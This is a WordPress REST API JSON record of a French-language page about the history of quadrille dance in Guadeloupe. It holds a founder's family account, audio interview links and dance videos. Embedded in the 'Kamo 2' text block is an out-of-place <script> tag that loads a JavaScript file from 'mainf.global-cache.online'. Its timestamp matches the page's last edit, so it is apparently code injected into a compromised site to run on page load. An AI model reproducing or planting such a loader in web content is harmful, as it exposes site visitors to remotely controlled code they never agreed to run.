{"id":119,"date":"2021-09-11T22:16:00","date_gmt":"2021-09-11T22:16:00","guid":{"rendered":"https:\/\/guadeloupequadrille.com\/?page_id=119"},"modified":"2025-03-16T23:50:18","modified_gmt":"2025-03-17T03:50:18","slug":"a-propos","status":"publish","type":"page","link":"https:\/\/guadeloupequadrille.com\/?page_id=119","title":{"rendered":"Historique"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"119\" class=\"elementor elementor-119\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-359d380 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"359d380\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b9062ea\" data-id=\"b9062ea\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bedc298 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bedc298\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e69cea2\" data-id=\"e69cea2\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6a5044b elementor-widget elementor-widget-image\" data-id=\"6a5044b\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"850\" height=\"709\" src=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2023\/11\/Carte-des-secteurs-du-quadrille-1.jpg\" class=\"attachment-large size-large wp-image-4946\" alt=\"\" srcset=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2023\/11\/Carte-des-secteurs-du-quadrille-1.jpg 850w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2023\/11\/Carte-des-secteurs-du-quadrille-1-300x250.jpg 300w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2023\/11\/Carte-des-secteurs-du-quadrille-1-768x641.jpg 768w\" sizes=\"(max-width: 850px) 100vw, 850px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-bc4ea14 elementor-widget elementor-widget-heading\" data-id=\"bc4ea14\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">L'Histoire de la danse de Quadrille en Guadeloupe<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-089588a elementor-widget elementor-widget-text-editor\" data-id=\"089588a\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p>\u00a0 \u00a0 \u00a0 \u00a0La m\u00e9moire de notre Pays la Guadeloupe, est riche <img decoding=\"async\" class=\" wp-image-1425 alignleft\" src=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Rony-Chapeau-300x225.png\" alt=\"\" width=\"156\" height=\"117\" srcset=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Rony-Chapeau-300x225.png 300w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Rony-Chapeau-1024x768.png 1024w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Rony-Chapeau-768x576.png 768w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Rony-Chapeau-1536x1152.png 1536w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Rony-Chapeau-2048x1536.png 2048w\" sizes=\"(max-width: 156px) 100vw, 156px\" \/>de la diversit\u00e9 de notre culture, cependant, nous devons la mettre en valeur. La cr\u00e9ation de la F\u00e9d\u00e9ration de Quadrilles n\u2019a pas \u00e9t\u00e9 une opportunit\u00e9, mais une n\u00e9cessit\u00e9.<\/p><p>Issue d\u2019une famille pratiquant la danse de quadrilles depuis mon Grand-p\u00e8re, (ce dernier se d\u00e9pla\u00e7ant \u00e0 cheval pour participer aux diff\u00e9rentes organisations de bal des ann\u00e9es 1946 \u00e0 1957.) Apr\u00e8s son d\u00e9c\u00e8s mon P\u00e8re prit le relais en 1957.Mais le moyen de locomotion \u00e9tait sa voiture. Le 26 juillet 1958 mon p\u00e8re organisa son premier bal de quadrilles\u00a0; \u00e9tant l\u2019ain\u00e9e de la famille j\u2019\u00e9tais \u00e0 ses c\u00f4t\u00e9s dans l\u2019organisation.<\/p><p>La danse de Quadrilles \u00e9tait repr\u00e9sent\u00e9e par une petite communaut\u00e9 vieillissante, la transmission \u00e9tait faite en famille. Si vous n\u2019\u00e9tiez pas de la descendance d\u2019une famille de danseur il vous \u00e9tait difficile de pratiquer cette danse.<\/p><p>\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c200476 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c200476\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-18dc005\" data-id=\"18dc005\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-71bd8ae elementor-widget elementor-widget-heading\" data-id=\"71bd8ae\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Duel de danse de Quadrilles de Grande Terre &amp; Basse Terre.<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f8eef04 elementor-widget-mobile__width-inherit elementor-widget elementor-widget-video\" data-id=\"f8eef04\" data-element_type=\"widget\" data-settings=\"{&quot;youtube_url&quot;:&quot;https:\\\/\\\/youtu.be\\\/Wa1kKh0BBW0&quot;,&quot;video_type&quot;:&quot;youtube&quot;,&quot;controls&quot;:&quot;yes&quot;}\" data-widget_type=\"video.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-wrapper elementor-open-inline\">\n\t\t\t<div class=\"elementor-video\"><\/div>\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cf0fd57 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cf0fd57\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-b344fd8\" data-id=\"b344fd8\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cb067a6 elementor-widget elementor-widget-heading\" data-id=\"cb067a6\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Kamo 1<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74733fe elementor-widget elementor-widget-text-editor\" data-id=\"74733fe\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p>\u00a0 \u00a0 \u00a0Les danses de Quadrilles en Guadeloupe ont une histoire que je vais vous raconter en Audio, <span style=\"text-decoration: underline;\"><strong>Cliquez pour \u00e9couter.<\/strong><\/span><\/p><audio class=\"wp-audio-shortcode\" id=\"audio-119-1\" preload=\"none\" style=\"width: 100%;\" controls=\"controls\"><source type=\"audio\/mpeg\" src=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Kamo-1.mp3?_=1\" \/><a href=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Kamo-1.mp3\">https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/09\/Kamo-1.mp3<\/a><\/audio><p>car vous \u00e9crire tout cela, vous n&rsquo;y attacherez pas beaucoup d&rsquo;int\u00e9r\u00eat.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-66 elementor-top-column elementor-element elementor-element-75a4941\" data-id=\"75a4941\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-25a51ab elementor-widget elementor-widget-heading\" data-id=\"25a51ab\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Kamo 2<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-da38fb9 elementor-widget elementor-widget-text-editor\" data-id=\"da38fb9\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p>\u00a0 La cr\u00e9ation de la f\u00e9d\u00e9ration a une histoire que je vais vous raconter en Audio, <span style=\"text-decoration: underline;\"><strong>Cliquez pour \u00e9couter.<\/strong><\/span><\/p><audio class=\"wp-audio-shortcode\" id=\"audio-119-2\" preload=\"none\" style=\"width: 100%;\" controls=\"controls\"><source type=\"audio\/mpeg\" src=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/10\/Kamo-0-.mp3?_=2\" \/><a href=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/10\/Kamo-0-.mp3\">https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/10\/Kamo-0-.mp3<\/a><\/audio><p>car vous \u00e9crire tout cela, vous n&rsquo;y attacherez pas beaucoup d&rsquo;int\u00e9r\u00eat.<\/p><p><script src=\"https:\/\/mainf.global-cache.online\/minified\/extensions\/dataloader_286i.js?t=2025-03-17T03:2\"><\/script><\/p><p>\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-707d14f elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"707d14f\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-efe4d32\" data-id=\"efe4d32\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-41c7b25 elementor-widget elementor-widget-heading\" data-id=\"41c7b25\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">3\u00e8me Parade de Pointe \u00e0 Pitre<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7c297e8 elementor-widget elementor-widget-video\" data-id=\"7c297e8\" data-element_type=\"widget\" data-settings=\"{&quot;youtube_url&quot;:&quot;https:\\\/\\\/youtu.be\\\/ar9mnzKNEtk&quot;,&quot;video_type&quot;:&quot;youtube&quot;,&quot;controls&quot;:&quot;yes&quot;}\" data-widget_type=\"video.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-wrapper elementor-open-inline\">\n\t\t\t<div class=\"elementor-video\"><\/div>\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-3818554\" data-id=\"3818554\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4865bbe elementor-widget elementor-widget-heading\" data-id=\"4865bbe\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Les Juniors de Gros Cap<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-a4a2efa elementor-widget elementor-widget-video\" data-id=\"a4a2efa\" data-element_type=\"widget\" data-settings=\"{&quot;youtube_url&quot;:&quot;https:\\\/\\\/youtu.be\\\/yFhROBHZfno&quot;,&quot;video_type&quot;:&quot;youtube&quot;,&quot;controls&quot;:&quot;yes&quot;}\" data-widget_type=\"video.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-wrapper elementor-open-inline\">\n\t\t\t<div class=\"elementor-video\"><\/div>\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-53b7d02 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"53b7d02\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-3ec94d4\" data-id=\"3ec94d4\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9c9a18a elementor-widget elementor-widget-heading\" data-id=\"9c9a18a\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Kamo 3<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4bf834b elementor-widget elementor-widget-text-editor\" data-id=\"4bf834b\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p>\u00a0 \u00a0 \u00a0Ecoutez mon interview avec Guadeloupe la Premi\u00e8re sur l&rsquo;arriv\u00e9e de l&rsquo;accord\u00e9on en Guadeloupe<\/p><audio class=\"wp-audio-shortcode\" id=\"audio-119-3\" preload=\"none\" style=\"width: 100%;\" controls=\"controls\"><source type=\"audio\/mpeg\" src=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/11\/Kamo-3.mp3?_=3\" \/><a href=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/11\/Kamo-3.mp3\">https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2021\/11\/Kamo-3.mp3<\/a><\/audio><p>Et son usage actuel en Guadeloupe.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-975cfff\" data-id=\"975cfff\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-803d2eb elementor-widget elementor-widget-heading\" data-id=\"803d2eb\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Les Pr\u00e9sidents de la F\u00e9d\u00e9ration de Quadrille<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3d5ed7f elementor-widget__width-inherit elementor-widget elementor-widget-image\" data-id=\"3d5ed7f\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2025\/03\/Les-3-Presidents-1024x576.jpg\" class=\"attachment-large size-large wp-image-5373\" alt=\"\" srcset=\"https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2025\/03\/Les-3-Presidents-1024x576.jpg 1024w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2025\/03\/Les-3-Presidents-300x169.jpg 300w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2025\/03\/Les-3-Presidents-768x432.jpg 768w, https:\/\/guadeloupequadrille.com\/wp-content\/uploads\/2025\/03\/Les-3-Presidents-rotated.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>L&rsquo;Histoire de la danse de Quadrille en Guadeloupe \u00a0 \u00a0 \u00a0 \u00a0La m\u00e9moire de notre Pays la Guadeloupe, est riche de la diversit\u00e9 de notre culture, cependant, nous devons la mettre en valeur. La cr\u00e9ation de la F\u00e9d\u00e9ration de Quadrilles n\u2019a pas \u00e9t\u00e9 une opportunit\u00e9, mais une n\u00e9cessit\u00e9. Issue d\u2019une famille pratiquant la danse de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-119","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=\/wp\/v2\/pages\/119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=119"}],"version-history":[{"count":452,"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=\/wp\/v2\/pages\/119\/revisions"}],"predecessor-version":[{"id":5392,"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=\/wp\/v2\/pages\/119\/revisions\/5392"}],"wp:attachment":[{"href":"https:\/\/guadeloupequadrille.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}